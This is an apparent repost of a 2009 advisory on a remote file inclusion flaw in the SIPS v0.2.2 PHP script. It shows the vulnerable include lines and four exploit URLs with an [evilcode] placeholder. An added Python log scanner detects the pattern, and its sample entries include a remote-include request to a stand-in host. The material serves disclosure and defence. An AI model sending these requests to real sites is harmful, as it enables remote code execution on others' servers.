Computer Security
[EN] securityvulns.ru

From: Cru3l.b0y <Cru3l.b0y_(at)_gmail.com>
Date: 30.06.2009
Subject: SIPS v0.2.2 Remote File Inclusion Vulnerability

================================================================================

 [o] SIPS v0.2.2 Remote File Inclusion Vulnerability

      Software : SIPS v0.2.2
      Vendor   : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip
      Author   : Cru3l.b0y
      Home     : WwW.DeltaHacking.Net

================================================================================

 [o] Vulnerable file

      search.php

        include $config["sipssys"] ."/code/news.inc.php";

      readmore.php

        include $config["sipssys"] ."/code/news.inc.php";

      index.php

        include $config["sipssys"] ."/code/news.inc.php";
        include $config["sipssys"] ."/code/box.inc.php";

      search/submit.php

        include $config["sipssys"] ."/code/search.inc.php";

 [o] Exploit

      http://localhost/[path]/search.php?config["sipssys"]=[evilcode]
      http://localhost/[path]/readmore.php?config["sipssys"]=[evilcode]
      http://localhost/[path]/index.php?config["sipssys"]=[evilcode]
      http://localhost/[path]/search/submit.php?config["sipssys"]=[evilcode]

================================================================================
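
A log check for the request pattern in this advisory, as an added example that is not part of the original advisory: it flags requests to the four listed scripts whose query string carries a `config` or `config[...]` parameter, and marks those whose value starts with a URL scheme. The combined access-log format, the function names and the sample entries are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts the advisory lists as including from $config["sipssys"].
AFFECTED = ("/search.php", "/readmore.php", "/index.php", "/search/submit.php")
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Parameter names that address $config or one of its elements.
PARAM_RE = re.compile(r"^config(\[|$)")
# Values that start with a scheme (http://, ftp://, ...) rather than a local path.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)

def classify(line):
    """Return None, 'config-override' or 'config-override-remote' for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    try:
        target = urlsplit(m.group(1))
    except ValueError:  # malformed request target
        return None
    if not target.path.endswith(AFFECTED):
        return None
    verdict = None
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if not PARAM_RE.match(name.strip()):
            continue
        if SCHEME_RE.match(value.strip()):
            return "config-override-remote"
        verdict = "config-override"
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every flagged line, numbered from 1."""
    hits = [(n, classify(line)) for n, line in enumerate(lines, start=1)]
    return [(n, verdict) for n, verdict in hits if verdict]

# Constructed sample entries (documentation addresses and hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Jun/2009:10:00:01 +0000] "GET /sips/index.php?page=2 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [30/Jun/2009:10:00:07 +0000] "GET /sips/search.php?config[%22sipssys%22]=http://files.example/x HTTP/1.1" 200 312',
    '192.0.2.44 - - [30/Jun/2009:10:00:09 +0000] "GET /sips/search/submit.php?config[sipssys]=/var/tmp HTTP/1.1" 200 298',
    '192.0.2.51 - - [30/Jun/2009:10:00:12 +0000] "GET /blog/research.php?config[a]=b HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}")
```

The match is on script name under any directory, so hits on an unrelated `index.php` need to be checked against where SIPS is actually installed.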
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


